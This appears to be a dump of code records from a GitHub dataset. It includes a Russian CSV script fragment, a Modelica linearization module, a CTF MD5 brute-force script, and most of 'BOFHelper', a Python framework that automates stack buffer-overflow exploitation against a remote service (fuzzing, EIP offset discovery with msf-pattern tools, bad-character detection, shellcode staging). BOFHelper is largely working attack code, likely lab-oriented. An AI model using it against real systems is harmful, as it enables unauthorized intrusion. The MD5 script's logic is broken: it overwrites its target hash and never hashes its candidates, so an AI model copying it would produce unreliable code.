list(filter(lambda x: x[col_name] != val, csv_file))\n except Exception as e:\n return f'Строка со значением {val} поля {col_name} не найдена'\n return (f'Строка со значением \"{val}\" столбца \"{col_name}\" удалена.')\n\n\n# Поиск по марке и модели\ndef find(val, col_name='Марка'):\n print(*list(filter(lambda x: x[col_name] == val, csv_file)))\n\n# Поиск по году выпуса\ndef find(val, col_name='Год_выпуска_авто'):\n print(*list(filter(lambda x: x[col_name] == val, csv_file)))\n# Поиск авто с самым большим пробегом\ndef find(val, col_name='Авто с самым большим пробегом'):\n print(*list(filter(lambda x: x[col_name] == val, csv_file)))\n\n # Поиск по гос номеру\n def find(val, col_name='Гос номер_авто'):\n print(*list(filter(lambda x: x[col_name] == val, csv_file)))\n# Сохранение\ndef save():\n with open('new 1.csv', \"w\", encoding=\"utf-8\", newline=\"\") as file:\n columns = ['ном', 'фио', 'возраст', 'телефон', 'отдел']\n writer = csv.DictWriter(file, delimiter=\";\", fieldnames=columns)\n writer.writeheader()\n writer.writerows(csv_file)\n print(\"Данные добавлены!\")\n\n\n# Открыт ли файл или нет\ndef show_csv():\n if len(csv_file) == 0:\n print(type(csv_file))\n else:\n print('{:<5}{:<25}{:<8}{:<12}{:<15}'.format(\n 'ном', 'фио', 'возраст', 'телефон', 'отдел'\n ))\n for el in csv_file:\n print('{:<5}{:<25}{:<8}{:<12}{:<15}'.format(el[\"ном\"],\n el[\"фио\"],\n el[\"возраст\"],\n el[\"телефон\"],\n el['отдел']))\n","repo_name":"GudkovaO/07_mod-1-","sub_path":"mod1.py","file_name":"mod1.py","file_ext":"py","file_size_in_byte":3704,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"25309898358","text":"import os\nimport tempfile\nimport typing as t\nfrom pathlib import Path\n\nimport numpy as np\nimport pandas as pd\nfrom OMPython import OMCSessionZMQ\nfrom pyfmi import fmi, load_fmu\n\nfrom mpc_optimization.fmu_source import FmuSource, ModelicaModelInfo\nfrom mpc_optimization.utils import ModelVariables\n\n\ndef _generate_control_csv(control_df: pd.DataFrame) -> Path:\n # fd, filepath = tempfile.mkstemp()\n filepath = '/home/developer/ipynotebooks/inputs.csv'\n try:\n # renamer = dict(zip(control_df.columns, map(lambda x: f\"'u_{x}'\", control_df.columns)))\n control_df.to_csv(filepath, index=False, line_terminator=',\\n', sep=',')\n except:\n os.remove(filepath)\n raise\n return Path(filepath)\n\n\ndef linearize_model(model_info: ModelicaModelInfo,\n initial_parameters: ModelVariables = dict(),\n control_df: t.Optional[pd.DataFrame] = None) -> fmi.FMUModelCS2:\n omc = OMCSessionZMQ()\n is_loaded: bool = omc.sendExpression(f'loadFile(\"{model_info.location}\")')\n if not is_loaded:\n raise RuntimeError(\"Could not load model: \")\n stopTime = 100\n path_to_csv = None\n if control_df is not None:\n path_to_csv = _generate_control_csv(control_df.reset_index())\n stopTime = control_df.index[-1]\n\n initial_parameters_flags = \"\".join([f'-override {var}={val}' for var, val in initial_parameters.items()])\n input_file_flags = f\"-csvInput {path_to_csv}\" if path_to_csv is not None else \"\"\n\n linearization_result = omc.sendExpression(\n f'linearize({model_info.name}, startTime=0, stopTime={stopTime}, stepSize=10, simflags=\"{initial_parameters_flags} {input_file_flags}\", outputFormat=\"csv\")'\n )\n\n if path_to_csv is not None:\n os.remove(path_to_csv)\n\n if linearization_result is None or not len(linearization_result['resultFile']):\n print(linearization_result)\n raise RuntimeError(\"Could not linearize a model: \")\n\n fmu_path = FmuSource.from_modelica(\n ModelicaModelInfo(Path(\"linearized_model.mo\"), \"linearized_model\")).fmu_path\n model = load_fmu(str(fmu_path))\n\n # FMU exported from OpenModelica doesn't estimate from time 0,\n # so simulation from 0 to 0 helps\n opts = model.simulate_options()\n opts['silent_mode'] = True\n model.simulate(0, 0, options=opts)\n\n return model\n\n\ndef _read_model_matrix(model: fmi.FMUModelCS2, matrix_name: str, shape: t.Tuple[int, int]):\n M = np.zeros(shape)\n for i in range(1, shape[0] + 1):\n for j in range(1, shape[1] + 1):\n M[i - 1, j - 1] = model.get(f'{matrix_name}[{i},{j}]')\n return M\n\n\ndef get_linear_model_matrices(model: fmi.FMUModelCS2):\n x_num = int(model.get('n'))\n u_num = int(model.get('m'))\n y_num = int(model.get('p'))\n\n A = _read_model_matrix(model, 'A', (x_num, x_num))\n B = _read_model_matrix(model, 'B', (x_num, u_num))\n C = _read_model_matrix(model, 'C', (y_num, x_num))\n D = _read_model_matrix(model, 'D', (y_num, u_num))\n return A, B, C, D\n","repo_name":"Midren/MPC_for_battery_operation","sub_path":"python_libs/mpc_optimization/linearization.py","file_name":"linearization.py","file_ext":"py","file_size_in_byte":3014,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"21"} +{"seq_id":"72178383412","text":"# -*- coding: utf-8 -*-\r\nimport hashlib\r\n\r\nm = '4850B7446BBB20AAD140E7B0A964A57D'\r\nk = '2453148193'\r\n\r\n\r\nEN = \"ABCDEFGHIJKLMNOPQRSTUVWXYZ\"\r\n\r\nen = \"abcdefghijklmnopqrstuvwxyz\"\r\n\r\nRU = \"АБВГДЕЁЖЗИЙКЛМНОПРСТУФХЦЧШЩЪЫЬЭЮЯ\"\r\n\r\nru = \"абвгдеёжзийклмнопрстуфхцчшщъыьэюя\"\r\n\r\ndigits = \"1234567890\"\r\n\r\nspace = \" \"\r\n\r\np = \",.-!?;:'\\\"/()\"\r\n\r\nop = \"+-*/:^()<>=\"\r\n\r\nall_spec = \"`~!@#$%^&*-_=+\\\\|/?.>,< '\\\";:[]{}\"\r\n\r\nclass ABCIterator:\r\n firstuse_flag = True\r\n stop = None\r\n\r\n def __init__(self, start=\"\", stop=None, start_len=None, stop_len=None, abc=en+EN+digits+all_spec):\r\n assert len(abc) > 0\r\n\r\n if start_len is not None:\r\n\r\n assert start_len > 0\r\n\r\n #assert start == \"\"\r\n\r\n self.current_str = list(abc[0]*start_len)\r\n\r\n else:\r\n\r\n self.current_str = list(filter(lambda x: x in abc, start))\r\n\r\n if stop_len is not None:\r\n\r\n assert (start_len is None) or (start_len <= stop_len)\r\n assert stop_len > 0\r\n\r\n self.stop = list(abc[0]*(stop_len+1)) # т.к. итератор работает с полуотрезками\r\n\r\n else:\r\n\r\n if stop is not None: self.stop = list(filter(lambda x: x in abc, stop))\r\n\r\n self.abc = list(abc)\r\n\r\n def __iter__(self):\r\n\r\n return self\r\n\r\n def next(self):\r\n\r\n if (self.stop is not None) and (self.stop == self.current_str):\r\n\r\n raise StopIteration\r\n\r\n if self.current_str == []:\r\n\r\n self.current_str.append(self.abc[0])\r\n\r\n self.firstuse_flag = False\r\n\r\n return self.abc[0]\r\n\r\n elif self.firstuse_flag:\r\n\r\n self.firstuse_flag = False\r\n\r\n return \"\".join(self.current_str)\r\n\r\n offset = 0\r\n\r\n while offset < len(self.current_str):\r\n if self.current_str[offset] != self.abc[-1]:\r\n self.current_str[offset] = self.abc[self.abc.index(self.current_str[offset])+1]\r\n # выпендрёшь для полуотрезка\r\n if (self.stop is not None) and (self.current_str == self.stop):\r\n raise StopIteration\r\n return \"\".join(self.current_str)\r\n self.current_str[offset] = self.abc[0]\r\n offset += 1\r\n self.current_str = [self.abc[0]] + self.current_str\r\n # опять же оно же\r\n if (self.stop is not None) and (self.current_str == self.stop):\r\n raise StopIteration\r\n return \"\".join(self.current_str)\r\n\r\n#===============\r\nm = hashlib.md5()\r\nj = 0\r\nfor i in ABCIterator(start_len=1, stop_len=10):\r\n md = k + i\r\n mdd = m.hexdigest()\r\n j += 1\r\n if j % 1000000 == 0:\r\n print(j, len(i))\r\n if mdd == m:\r\n print(md)\r\n break\r\n","repo_name":"D1ment/ctf-python","sub_path":"bruteforce/generator_pass.py","file_name":"generator_pass.py","file_ext":"py","file_size_in_byte":2842,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"14942883055","text":"#!/usr/bin/python\nimport socket\nimport time\nfrom binascii import unhexlify\nfrom re import search, split\nfrom struct import pack\nfrom subprocess import run\n\nfrom pwn import asm\n\n# Error codes\nBOFErrorSuccess = 0\nBOFErrorFailure = -1\nBOFErrorConnectionRefused = -2\nBOFErrorConnectionReset = -3\nBOFErrorConnectionTimeout = -4\nBOFErrorServiceAlive = -5\nBOFErrorNoSpace = -6\nBOFErrorInvalid = -7\n\nBOFAllHex = ['01', '02', '03', '04', '05', '06', '07', '08', '09', '0a', '0b', '0c', '0d', '0e', '0f', '10', '11',\n '12', '13', '14', '15', '16', '17', '18', '19', '1a', '1b', '1c', '1d', '1e', '1f', '20', '21', '22',\n '23', '24', '25', '26', '27', '28', '29', '2a', '2b', '2c', '2d', '2e', '2f', '30', '31', '32', '33',\n '34', '35', '36', '37', '38', '39', '3a', '3b', '3c', '3d', '3e', '3f', '40', '41', '42', '43', '44',\n '45', '46', '47', '48', '49', '4a', '4b', '4c', '4d', '4e', '4f', '50', '51', '52', '53', '54', '55',\n '56', '57', '58', '59', '5a', '5b', '5c', '5d', '5e', '5f', '60', '61', '62', '63', '64', '65', '66',\n '67', '68', '69', '6a', '6b', '6c', '6d', '6e', '6f', '70', '71', '72', '73', '74', '75', '76', '77',\n '78', '79', '7a', '7b', '7c', '7d', '7e', '7f', '80', '81', '82', '83', '84', '85', '86', '87', '88',\n '89', '8a', '8b', '8c', '8d', '8e', '8f', '90', '91', '92', '93', '94', '95', '96', '97', '98', '99',\n '9a', '9b', '9c', '9d', '9e', '9f', 'a0', 'a1', 'a2', 'a3', 'a4', 'a5', 'a6', 'a7', 'a8', 'a9', 'aa',\n 'ab', 'ac', 'ad', 'ae', 'af', 'b0', 'b1', 'b2', 'b3', 'b4', 'b5', 'b6', 'b7', 'b8', 'b9', 'ba', 'bb',\n 'bc', 'bd', 'be', 'bf', 'c0', 'c1', 'c2', 'c3', 'c4', 'c5', 'c6', 'c7', 'c8', 'c9', 'ca', 'cb', 'cc',\n 'cd', 'ce', 'cf', 'd0', 'd1', 'd2', 'd3', 'd4', 'd5', 'd6', 'd7', 'd8', 'd9', 'da', 'db', 'dc', 'dd',\n 'de', 'df', 'e0', 'e1', 'e2', 'e3', 'e4', 'e5', 'e6', 'e7', 'e8', 'e9', 'ea', 'eb', 'ec', 'ed', 'ee',\n 'ef', 'f0', 'f1', 'f2', 'f3', 'f4', 'f5', 'f6', 'f7', 'f8', 'f9', 'fa', 'fb', 'fc', 'fd', 'fe', 'ff']\n\n# Live prefix/suffix options\nBOFLiveOptions = [\"payload_len\", \"local_host\", \"remote_host\", \"local_port\", \"remote_port\"]\n\n\ndef live_option_long(option: str) -> bytes:\n return (\"BOFLive.\" + option).encode()\n\n\ndef execute(cmd: str) -> bytes:\n return run(cmd, shell=True, capture_output=True).stdout\n\n\ndef is_hex(integer: str) -> bool:\n return not search(r\"[^a-f0-9]\", integer)\n\n\ndef is_register(reg: str) -> bool:\n regs = ['ax', 'bx', 'cx', 'dx', 'bp', 'sp', 'si', 'di']\n if len(reg) != 3:\n return False\n if reg[0] != \"r\" and reg[0] != \"e\":\n return False\n for item in regs:\n if reg[1:] == item:\n return True\n return False\n\n\ndef bytes_escape_all(in_byte: bytes) -> list[str]:\n out_str = []\n for b in in_byte:\n out_str.append(''.join('\\\\x{:02x}'.format(b)))\n return out_str\n\n\ndef bytes_escape_all_str(in_bytes: bytes) -> str:\n return \"'{}'\".format(''.join('\\\\x{:02x}'.format(b) for b in in_bytes))\n\n\ndef split_list(lst: list, n: int) -> list[list]:\n d, r = divmod(len(lst), n)\n for i in range(n):\n si = (d + 1) * (i if i < r else r) + d * (0 if i < r else i - r)\n yield lst[si:si + (d + 1 if i < r else d)]\n\n\n# @class BOFHelper\n# @abstract Class performing simple buffer overflow against specified target.\n# @discussion This class exploits a basic buffer overflow (without ASLR, DEP, etc.), cover-\n# ing every step involved. With independent functions to handle fuzzing, EIP\n# location, bad character detection, shellcode generation, space expansion,\n# file generation, and, with everything gathered, exploit dispatch, it provides\n# maximum flexibility and customizability for almost any scenario. In addition\n# to prefixes and suffixes, it supports live headers to be sent before the payload,\n# which would be particularly useful when the attack surface is an HTTP request.\n# During the reconnaissance process, this program is designed with minimal user\n# interaction in mind. For instance, its automated bad character detection process\n# only requires the user to restart the service when prompted, with no need to\n# continuously investigate the ESP dump (until all critical bad characters are\n# found). It eventually generates a well-formatted Python 2 POC script based on\n# the information gathered so that the user can easily replicate the exploit.\n#\n# All other types of buffer overflow should be handled by subclasses of this\n# base class. Make sure to adhere to the structure and workflow of this class\n# and override all necessary functions.\n# @var interface The interface from which all data would be sent. The local would be obtained\n# based on the interface specified.\n# @var local_port The local port that the target would connect to once exploited.\n# @var ip The remote IP to connect to.\n# @var port The remote port to connect to.\n# @var header The live header that is appended before the payload. It could be altered based\n# on the circumstance of each send_data() request. Refer to send_data() for more\n# details.\n# All possible live options are listed in @BOFLiveOptions. To use one, simply\n# replace the relevant substring of the header with \"BOFLive.\" plus an option.\n# @var prefix Fixed prefix of the payload.\n# @var suffix Fixed suffix of the payload.\n# @var inc The step of increment during the fuzzing stage.\n# @var timeout The timeout for send_data() requests. Increase if your connection is slow.\n# @var recv Set to true only if the service responds to a request. Otherwise, it might\n# cause the program to hang.\n# @var ask_crash Prompt everytime if the service has crashed instead of inferring it from the\n# result of send_data(). Set to true if your service can be connected to after\n# it crashes.\n# @var strict In some edge cases, the EIP can be controlled only with a payload of a certain\n# size. The program would try to find this value if it is set to true. Beware\n# that the process may require extensive use of a debugger and be very tedious.\n# @var verify Send an empty payload after every send_data() request to verify that the service\n# has crashed successfully. May be required in some edge cases.\n# @var debug Verbose logging.\n\n\nclass BOFHelper:\n def __init__(self, interface: str, local_port: int, ip: str, port: int, header: bytes = b\"\",\n prefix: bytes = b\"\", suffix: bytes = b\"\", inc: int = 200, timeout: float = 5.0,\n recv: bool = False, ask_crash: bool = False, strict: bool = False, verify: bool = False,\n debug: bool = True):\n self._interface = interface\n self._lPort = local_port\n self._lIP = execute(\"ip addr show %s | grep 'inet ' | awk '{print $2}' | cut -d '/' -f 1\" % self._interface) \\\n .decode().strip()\n self._ip = ip\n self._port = port\n self._header = header\n self._origHeader = header\n self._liveOptions = {}\n self._prefix = prefix\n self._suffix = suffix\n self._inc = inc # The step of increment in getNumBytesToOverflow().\n self._timeout = timeout # The default value of 200 would be the efficient for most services.\n self._recv = recv\n self._askCrash = ask_crash\n self._strict = strict\n self._verify = verify\n self._debug = debug\n\n self._init_options()\n\n self._numBytes = 0\n self._numBytesObtained = False\n self._strictSizeFound = False\n self._eipOffset = 0\n self._eipObtained = False\n self._badChars = [\"00\"]\n self._badCharsFound = False\n self._shellCode = b\"\"\n self._shellCodeName = \"\"\n self._shellCodeGenerated = False\n self._espPadding = 0\n self._espPaddingSet = False\n self._firstStageASM = \"\"\n self._firstStage = b\"\"\n self._stackSpace = 0\n self._shellCodeInESP = True\n self._spaceExpanded = False\n self._eip = b\"\"\n self._exploit = b\"\"\n self._endPadding = 0\n self._fileGenerated = False\n\n def __del__(self):\n if not self._fileGenerated:\n self._step_log(\"Printing information...\")\n if self._strict and self._numBytesObtained:\n self._success_log(\"Strict payload size: %d\" % self._numBytes)\n if self._eipObtained:\n self._success_log(\"EIP Offset: %d\" % self._eipOffset)\n if self._espPaddingSet:\n self._success_log(\"ESP Padding: %d\" % self._espPadding)\n if self._badCharsFound:\n self._success_log(\"Bad characters: 0x%s\" % \" 0x\".join(self._badChars))\n if self._shellCodeGenerated and not self._shellCodeInESP:\n self._success_log((\"First stage shell code: %s\" % bytes_escape_all_str(self._firstStage))\n .replace(\"'\", \"\"))\n if self._spaceExpanded:\n self._success_log(\"Stack space: %d\" % self._stackSpace)\n if self._eip:\n self._success_log((\"Overridden EIP: %s\" % bytes_escape_all_str(self._eip)).replace(\"'\", \"\"))\n\n # Logs & Helpers\n\n def _input(self, text: str, debug: bool = False) -> str:\n if (not debug) or (debug and self._debug):\n return input(\"(*) \" + text).strip()\n\n def __log(self, text: str, debug: bool = False) -> None:\n if (not debug) or (debug and self._debug):\n print(text)\n\n def _func_log(self, text: str, debug: bool = False) -> None:\n self.__log(\"[-] \" + text, debug)\n\n def _success_log(self, text: str, debug: bool = False) -> None:\n self.__log(\"[+] \" + text, debug)\n\n def _debug_log(self, text: str) -> None:\n self.__log(\"(-) \" + text, True)\n\n def _step_log(self, text: str, debug: bool = False) -> None:\n self.__log(\"(+) \" + text, debug)\n\n def _prompt_log(self, text: str, debug: bool = False) -> None:\n self.__log(\"(*) \" + text, debug)\n\n def _warn_log(self, text: str, debug: bool = False) -> None:\n self.__log(\"(!) \" + text, debug)\n\n def _err_log(self, text: str, debug: bool = False) -> None:\n self.__log(\"(!!!) \" + text, debug)\n\n def _prompt_restart(self) -> None:\n self._prompt_log(\"Please restart the vulnerable application. Type anything to continue...\")\n input()\n\n def _prompt_debugger(self) -> None:\n self._prompt_log(\"GO! Fire up your debugger! Type anything to continue...\")\n input()\n\n # @function _init_options\n # @abstract Initialize each option of @self._liveOptions to specified values.\n # @result None.\n\n def _init_options(self) -> None:\n for option in BOFLiveOptions:\n full_option = live_option_long(option)\n if full_option in self._header:\n if option == \"local_host\":\n self._liveOptions[full_option] = self._lIP.encode()\n elif option == \"remote_host\":\n self._liveOptions[full_option] = self._ip.encode()\n elif option == \"local_port\":\n self._liveOptions[full_option] = bytes(self._lPort)\n elif option == \"remote_port\":\n self._liveOptions[full_option] = bytes(self._port)\n else:\n self._liveOptions[full_option] = b\"\"\n\n # @function _process_header_file\n # @abstract Process the header for use in generated POC.\n # @param header Original header.\n # @result Updated header.\n\n def _process_header_file(self, header: str) -> str:\n header = header.replace(live_option_long(\"payload_len\").decode(), \"' + str(len(payload)) + '\") \\\n .replace(live_option_long(\"local_host\").decode(), self._lIP) \\\n .replace(live_option_long(\"remote_host\").decode(), self._ip) \\\n .replace(live_option_long(\"local_port\").decode(), str(self._lPort)) \\\n .replace(live_option_long(\"remote_port\").decode(), str(self._port))\n return header\n\n # @function send_data\n # @abstract Helper function sending data to designated port on the target.\n # @discussion In this function, a socket is created to send the data in @buffer to @self._port.\n # The payload would be sent with the predefined prefix and suffix, and if the\n # request has timed out, it would be resent recursively (up to five times). If\n # the user has provided a header, its live options, if there is any, would be\n # updated based on the current request. To test if the service is open, simply\n # pass an empty (i.e. \"\") @buffer as the argument.\n # @param buffer Bytes object storing the data to be sent.\n # @param close Determines whether to close the socket. Set to false when sending the final\n # exploit.\n # @param trial Records the number of time this request has been resent. Set to 5 to disable\n # resending in case of socket timeout.\n # @result BOFErrorSuccess if succeeded; BOFErrorConnectionRefused if connection refused;\n # BOFErrorConnectionReset if connection reset; BOFErrorConnectionTimeout if socket\n # timed out.\n\n def send_data(self, buffer: bytes, trial: int = 3, close: bool = True) -> int:\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n s.settimeout(self._timeout)\n try:\n s.connect((self._ip, self._port))\n if self._origHeader:\n payload_len = live_option_long(\"payload_len\")\n if payload_len in self._origHeader:\n self._liveOptions[payload_len] = str(len(buffer) + len(self._prefix) + len(self._suffix)).encode()\n self._header = self._origHeader\n for option in self._liveOptions:\n self._header = self._header.replace(option, self._liveOptions[option])\n\n s.send((self._header + self._prefix + buffer + self._suffix))\n if self._recv:\n res = s.recv(1024).decode()\n self._debug_log(res)\n if close:\n s.close()\n\n if self._verify and buffer:\n time.sleep(1)\n return self.send_data(b\"\")\n\n except ConnectionRefusedError:\n return BOFErrorConnectionRefused\n\n except ConnectionResetError:\n return BOFErrorConnectionReset\n\n except socket.timeout:\n if trial < 5:\n return self.send_data(buffer, trial + 1)\n self._err_log(\"Could not connect to %s at port %s!\" % (self._ip, self._port))\n self._warn_log(\"Remember to start the service!\")\n return BOFErrorConnectionTimeout\n\n return BOFErrorSuccess\n\n # @function _check_crash\n # @abstract Check if the service has crashed, based on @error or user input.\n # @param error If @self._askCrash has not been set, the status of the service would be determined\n # based on it.\n # @result True if the service has crashed; False otherwise.\n\n def _check_crash(self, error: int) -> bool:\n if self._askCrash:\n ans = self._input(\"Did the service crash? (y/n): \").lower()\n if ans == 'y':\n return True\n return False\n if error == BOFErrorConnectionReset or error == BOFErrorConnectionRefused:\n return True\n return False\n\n # @function get_esp_padding\n # @abstract Ask for the ESP padding.\n # @result None.\n\n def get_esp_padding(self) -> None:\n ans = self._input(\"How many bytes are between EIP and ESP (blank to skip): \")\n if ans == \"\" or ans == \"q\":\n self._espPadding = 0\n self._espPaddingSet = True\n self._espPadding = int(ans)\n self._espPaddingSet = True\n\n # @function set_esp_padding\n # @abstract Sets the ESP padding.\n # @result None.\n\n def set_esp_padding(self, padding: int) -> None:\n self._espPadding = padding\n self._espPaddingSet = True\n\n # @function _fuzz_bytes_overflow\n # @abstract Private function for finding a rough number of bytes needed to overflow the service.\n # @discussion This function recursively sends buffers, incrementing in size each iteration by\n # @self._inc, to the service and checks if it has crashed. If an overflow has been\n # triggered successfully, it would update @self._numBytes with @current.\n # @param current The number of bytes that is to be sent to the service in the current iteration.\n # @result BOFErrorSuccess if succeeded; BOFErrorConnectionRefused if failed on first trial;\n # BOFErrorTimeout if timed out.\n\n def _fuzz_bytes_overflow(self, current: int = 0) -> int:\n if current == 0:\n self._debug_log(\"Checking if service is open...\")\n else:\n self._debug_log(\"Fuzzing with %s bytes...\" % current)\n\n error = self.send_data(b\"\\x90\" * current)\n if error == BOFErrorConnectionTimeout:\n return BOFErrorConnectionTimeout\n\n # Service didn't crash -> increment @current by self._inc\n if not self._check_crash(error):\n if current == 0:\n self._debug_log(\"Service is open!\")\n return self._fuzz_bytes_overflow(current + self._inc)\n\n # Service crashed -> print and proceed\n if current == 0:\n self._err_log(\"Service is not open!\")\n return BOFErrorConnectionRefused\n\n self._success_log(\"Service crashed at %s bytes!\" % current)\n self._prompt_restart()\n\n # high = @current (as it has successfully caused overflow)\n # low = previous @current (i.e. current - self._inc)\n self._numBytes = current\n return BOFErrorSuccess\n\n # @function _ask_eip\n # @abstract Ask the user if EIP has been successfully overridden and update @self._numBytes if so.\n # @result True if EIP is overridden; False otherwise.\n\n def _ask_eip(self, current) -> bool:\n ans = self._input(\"Is EIP overridden by 90909090 (y/n): \").lower()\n self._prompt_restart()\n if ans == 'y':\n self._success_log(\"Strict size found: %d\" % current)\n self._numBytes = current\n self._strictSizeFound = True\n return True\n return False\n\n # @function _find_crash_threshold\n # @abstract Find the specific payload length on which the service first crashed.\n # @discussion Utilizing a binary search approach, this function recursively finds the smallest value\n # on which the service would crash which would be used in later functions to find the\n # strict payload size with which EIP could be obtained. Note that the debugger should\n # the kept open during the execution of this function. Extensive user interaction may\n # be required, but it should only be needed in edge cases.\n # @param high The current minimum number of bytes needed to overflow the service.\n # @param low The current maximum number of bytes that would not overflow the service.\n # @result BOFErrorSuccess is succeeded; BOFErrorConnectionTimeout if timed out.\n\n def _find_crash_threshold(self, high: int = 0, low: int = 0) -> int:\n if self._strictSizeFound:\n return BOFErrorSuccess\n\n # Success!\n if low + 1 == high:\n self._success_log(\"Crash threshold found: %s!\\n\" % high)\n self._numBytes = high\n return BOFErrorSuccess\n\n self._prompt_debugger()\n mid = low + (high - low) // 2 # Safe way to get mid\n self._debug_log(\"Sending buffer of size %s...\" % mid)\n error = self.send_data(b\"\\x90\" * mid)\n\n # Did not crash -> set @low to mid\n if not self._check_crash(error) and error != BOFErrorConnectionTimeout:\n return self._find_crash_threshold(high, mid)\n\n # Service crashed -> set @high to mid\n if self._ask_eip(mid):\n return BOFErrorSuccess\n return self._find_crash_threshold(mid, low)\n\n # @function get_num_bytes\n # @abstract Find the particular payload size needed to crash the service and obtain EIP.\n # @discussion This function starts by fuzzing the service with _fuzz_bytes_overflow() to\n # determine a size that would crash the service. If the class is in strict\n # mode, it would attempt to first discover the crash threshold with function\n # _find_crash_threshold(). With the threshold discovered, this function steps\n # up from it one byte at a time in order to find the strict size for EIP control.\n # Beware that this function may take a great amount of user interaction.\n # @result @self._numBytes if succeeded; BOFErrorFailure if fuzzing failed; BOFErrorInvalid\n # if service did not crash; BOFErrorConnectionTimeout if timed out.\n\n def get_num_bytes(self) -> int:\n self._func_log(\"Fuzzing service...\")\n if not self._numBytesObtained:\n if self._fuzz_bytes_overflow():\n return BOFErrorFailure\n self._numBytesObtained = True\n\n if self._strict and not self._strictSizeFound:\n if self._find_crash_threshold(self._numBytes, self._numBytes - self._inc) == BOFErrorConnectionTimeout:\n return BOFErrorConnectionTimeout\n while True:\n self._prompt_debugger()\n if not self._check_crash(self.send_data(b\"\\x90\" * self._numBytes)):\n self._err_log(\"Service did not crash! (should never happen)\")\n return BOFErrorInvalid\n if self._ask_eip(self._numBytes):\n break\n self._numBytes += 1\n continue\n\n return self._numBytes\n\n # @function set_num_bytes\n # @abstract Sets the number of bytes needed to overflow the service.\n # @param num_bytes The number of bytes required to overflow the service.\n # @param strict Sets the class in strict mode.\n # @result None.\n\n def set_num_bytes(self, num_bytes: int, strict: bool = False) -> None:\n self._strict = strict\n self._numBytes = num_bytes\n self._numBytesObtained = True\n if strict:\n self._strictSizeFound = True\n\n # @function get_eip_offset\n # @abstract Obtain the EIP offset for the specified service.\n # @discussion With @self._numBytes obtained, this function locates the offset of ESP with a\n # unique pattern of length @self._numBytes, generated by the msf_pattern_create\n # utility. If the service has crashed due to overflow, the user should provide\n # the value at the EIP register which would be then used to identify the exact\n # offset of EIP on the stack. The user would also be prompted to provide the\n # value at the top of ESP so that the program could automatically calculate the\n # ESP padding.\n # @result @self._eipOffset if succeeded; BOFErrorConnectionTimeout if service timed out;\n # BOFErrorServiceAlive if service did not crash; BOFErrorFailure if the value is\n # not found in the pattern; BOFErrorInvalid if @self._numBytes is not obtained\n # or if the stack size is too small.\n\n def get_eip_offset(self) -> int:\n self._func_log(\"Locating EIP...\")\n if self._eipObtained:\n return self._eipOffset\n\n if not self._numBytesObtained:\n self._err_log(\"Please first obtain the number of bytes needed to overflow the service!\")\n return BOFErrorInvalid\n\n if self._strict and not self._strictSizeFound:\n self._err_log(\"Please first obtain the strict payload size!\")\n return BOFErrorInvalid\n\n self._prompt_debugger()\n error = self.send_data(execute(\"msf-pattern_create -l %s\" % self._numBytes), 5)\n\n # Service didn't crash. Bye!\n if not self._check_crash(error) and error != BOFErrorConnectionTimeout:\n self._err_log(\"Service did not crash!\")\n return BOFErrorServiceAlive\n\n # Service crashed -> find EIP & ESP padding\n eip = self._input(\"Service crashed. Please enter the value in EIP: \").replace(\"\\\\x\", \"\").replace(\"0x\", \"\")\n esp = self._input(\"Please enter the first 4 bytes of ESP in the stack: \").replace(\"\\\\x\", \"\").replace(\"0x\", \"\")\n self._step_log(\"Locating EIP offset and ESP padding in the pattern...\")\n\n try:\n self._eipOffset = int(execute(\"msf-pattern_offset -q %s\" % eip).decode().split()[-1])\n self._espPadding = int(execute(\"msf-pattern_offset -q %s\" % esp).decode().split()[-1]) - self._eipOffset - 4\n self._espPaddingSet = True\n except IndexError:\n self._warn_log(\"Value not found in pattern!\")\n return BOFErrorFailure\n\n self._eipObtained = True\n self._stackSpace = self._numBytes - self._eipOffset - 4 - self._espPadding\n if self._stackSpace <= 0:\n self._err_log(\"Stack space should be greater than 0!\")\n return BOFErrorInvalid\n self._success_log(\"EIP Offset: %s\" % self._eipOffset)\n self._success_log(\"ESP Padding: %s\" % self._espPadding)\n self._prompt_restart()\n return self._eipOffset\n\n # @function set_eip_offset\n # @abstract Manually set the EIP offset to a specified value.\n # @param offset The value @self._eipOffset is set to.\n\n def set_eip_offset(self, offset: int) -> None:\n if not self._espPaddingSet:\n self.get_esp_padding()\n if not self._numBytesObtained:\n self._numBytes = offset + 100\n self._numBytesObtained = True\n self._eipOffset = offset\n self._eipObtained = True\n\n # @function __check_input\n # @abstract Helper function to check for new bad characters in user input.\n # @result None.\n\n def __check_input(self) -> None:\n ans = self._input(\"Enter bad characters found (separate with space): \") \\\n .lower().replace(\"\\\\x\", \"\").replace(\"0x\", \"\")\n if ans == \"\":\n self._success_log(\"Empty input, assuming that all bad characters have been found!\")\n return\n\n for char in ans.split():\n if is_hex(char) and len(char) == 2:\n self._badChars.append(char)\n BOFAllHex.remove(char)\n\n # @function __check_dump\n # @abstract Helper function to check for new bad characters in hex dump.\n # @result None.\n\n def __check_dump(self, chars: list[str]) -> None:\n self._prompt_log(\"Dump at least %d bytes (stop input with \\\"q\\\"): \" % len(BOFAllHex))\n new_chars = []\n while True:\n ans = input().strip().lower().replace(\"\\\\x\", \"\").replace(\"0x\", \"\")\n if ans == \"q\":\n break\n for item in split(r\"[ |]\", ans):\n if is_hex(item) and len(item) == 2:\n new_chars.append(item)\n while new_chars[0] != chars[0] and new_chars[0] != \"00\":\n new_chars.pop(0)\n\n self._prompt_log(\"Processed dump: %s\" % \" \".join(new_chars))\n if self._input(\"Proceed? (y/n)\\n\").lower() != 'y':\n self._err_log(\"Dump malformed! Try again!\")\n return self.__check_dump(chars)\n\n if len(new_chars) < len(chars):\n self._err_log(\"Dump is too small! Try again!\")\n return self.__check_dump(chars)\n\n for i in range(len(chars)):\n if chars[i] != new_chars[i]:\n self._step_log(\"Identified new bad character: 0x%s\" % chars[i])\n self._badChars.append(chars[i])\n BOFAllHex.remove(chars[i])\n\n # @function __build_bad_buffer\n # @abstract Build the buffer to send based on the current character list.\n # @discussion It would place @chars in the middle of the filler space before EIP.\n # @param chars The current character list.\n # @result The assembled bytes object to send to the service.\n\n def __build_bad_buffer(self, chars: list[str]) -> bytes:\n offset_len = self._eipOffset - len(chars)\n return b\"\\x90\" * (offset_len // 2) \\\n + unhexlify(\"\".join(chars)) \\\n + b\"\\x90\" * (self._numBytes - len(chars) - (offset_len // 2))\n\n # @function __send_chars_user\n # @abstract Private function sending non-critical 